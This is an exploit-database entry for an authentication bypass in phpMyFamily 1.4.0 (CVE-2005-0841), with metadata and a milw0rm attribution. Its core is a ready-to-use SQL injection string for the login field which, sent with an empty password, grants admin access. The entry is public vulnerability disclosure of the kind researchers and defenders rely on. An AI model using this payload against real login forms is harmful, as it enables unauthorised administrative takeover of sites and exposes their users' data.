[] NeoSense

phpMyFamily 1.4.0 - Authentication Bypass

Author: kre0n
type: webapps
platform: php
port: 
date_added: 2005-03-20 
date_updated: 2016-05-06 
verified: 1 
codes: OSVDB-14913;CVE-2005-0841 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpmyfamily-1.4.0.tar.gz

# Tested with version 1.2.5 /str0ke

Login as admin without pass:

Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes)
Password: (empty)

# milw0rm.com [2005-03-21]